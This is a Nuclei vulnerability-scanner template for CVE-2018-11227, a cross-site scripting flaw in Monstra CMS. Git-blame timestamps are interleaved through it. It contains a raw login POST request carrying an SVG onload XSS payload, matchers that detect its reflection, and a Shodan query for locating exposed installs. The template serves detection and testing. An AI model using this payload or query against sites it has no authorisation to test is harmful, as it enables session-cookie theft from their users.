2023-01-09 06:03:27 +00:00
id : CVE-2018-11227
info :
2023-01-30 19:24:22 +00:00
name : Monstra CMS <=3.0.4 - Cross-Site Scripting
2023-01-09 06:03:27 +00:00
author : ritikchaddha
severity : medium
description : |
2023-01-30 19:24:22 +00:00
Monstra CMS 3.0.4 and earlier contains a cross-site scripting vulnerability via index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2023-09-06 12:57:14 +00:00
remediation : |
Upgrade Monstra CMS to a version higher than 3.0.4 or apply the official patch provided by the vendor.
2023-01-09 06:03:27 +00:00
reference :
- https://github.com/monstra-cms/monstra/issues/438
2023-01-10 10:56:28 +00:00
- https://www.exploit-db.com/exploits/44646
2023-01-30 19:24:22 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-11227
2023-07-11 19:49:27 +00:00
- https://github.com/monstra-cms/monstra/issues
2023-01-09 06:03:27 +00:00
classification :
2023-01-10 10:56:28 +00:00
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2023-01-09 06:03:27 +00:00
cve-id : CVE-2018-11227
2023-01-10 10:56:28 +00:00
cwe-id : CWE-79
2023-07-11 19:49:27 +00:00
epss-score : 0.02667
2023-11-27 09:19:41 +00:00
epss-percentile : 0.89284
2023-09-06 12:57:14 +00:00
cpe : cpe:2.3:a:monstra:monstra_cms:*:*:*:*:*:*:*:*
2023-01-09 06:03:27 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 12:57:14 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : monstra
product : monstra_cms
2023-09-06 12:57:14 +00:00
shodan-query : http.favicon.hash:419828698
2023-01-10 11:49:16 +00:00
tags : cve,cve2018,xss,mostra,mostracms,cms,edb
2023-01-09 06:03:27 +00:00
2023-04-27 04:28:59 +00:00
http :
2023-01-09 06:03:27 +00:00
- raw :
- |
POST /admin/index.php?id=pages HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
login="><svg/onload=alert(document.domain)>&password=xxxxxx&login_submit=Log+In
matchers-condition : and
matchers :
- type : word
part : body
words :
- "><svg/onload=alert(document.domain)>"
- "Monstra"
case-insensitive : true
2023-07-11 19:49:27 +00:00
condition : and
2023-01-09 06:03:27 +00:00
- type : word
part : header
words :
- "text/html"
- type : status
status :
- 200
2023-11-27 10:10:24 +00:00
# digest: 4a0a00473045022100b57d0f73650bd7e99bcd024527b4f9c2986ecc3f325b25442abcd7690fbba0b0022012523ec1ffc7c8c0f7b4c0e90ac7b4b4c87d54ccf3373c79e782565ebca74460:922c64590222798bb761d5b6d8e72950